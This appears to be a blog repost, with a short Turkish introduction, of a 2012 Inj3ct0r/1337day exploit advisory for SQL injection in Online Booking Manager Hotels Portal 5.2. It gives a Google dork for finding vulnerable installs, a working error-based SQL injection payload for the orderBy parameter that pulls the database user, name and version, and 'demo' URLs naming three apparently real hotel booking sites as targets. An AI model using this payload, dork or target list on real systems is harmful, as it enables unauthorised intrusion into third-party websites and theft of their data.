Online Booking Manager Hotels Portal – SQLi Vulnerability

Online Booking Manager Hotels Portal – SQLi Vulnerability
açık ve açığın kullanımı hakkında örnekler şu şekilde;

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: Online Booking Manager Hotels Portal - SQLi Vulnerability 
# Date: 2012-10-19 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.onlinebookingmanager.com/obm-portal-hotels/index.php 
# Category: webapps/php 
# Version: 5.2 
# Price: 912 USD 
# Google dork: inurl:besthotels.php?portalID= 
########################################## 
[#] Exploit: 
http://[host]/besthotels.php?orderBy=(ErrorBased Injection) 
orderBy=1+and(select 1 FROM(select count(*),concat((select (select concat(user(),database(),version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 
 
# Demo: 
http://www.stayinkos.com/hotels/besthotels.php?orderBy=1' 
http://ahabooking.com/besthotels.php?orderBy=1' 
http://bookingeurope.co/besthotels.php?orderBy=1' 
 
---- 
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team. 

 

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir